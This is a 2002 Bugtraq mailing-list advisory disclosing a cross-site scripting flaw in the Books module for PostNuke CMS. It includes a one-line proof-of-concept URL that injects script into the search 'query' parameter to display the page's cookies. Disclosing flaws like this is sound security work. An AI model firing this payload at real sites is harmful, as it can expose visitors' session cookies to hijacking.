[27294] in bugtraq
The Books Module for the PostNuke CMS XSS Vulnerability
daemon@ATHENA.MIT.EDU (Pistone)
Thu Oct 3 23:44:12 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: Pistone <jorgep@spdps.com.ar>
Reply-To: jorgep@spdps.com.ar
To: bugtraq@securityfocus.com
Date: Wed, 2 Oct 2002 21:47:08 -0300
MIME-Version: 1.0
Message-Id: <02100221470800.01116@Holmes>
Content-Transfer-Encoding: 8bit
X-MDaemon-Deliver-To: bugtraq@securityfocus.com
- ----------------------------------------------------
Class : input Validation Error
Risk : Due to the simplicity of the attack and the number of sites
that run module books the risk is classified as Medium to
High.
URL: Http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64)
This Books module version v0.6 is running as a Rogue (PN 0.7)
- ----------------------------------------------------
Exploit:
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
Change | x <>
- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------
Salu2
Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org
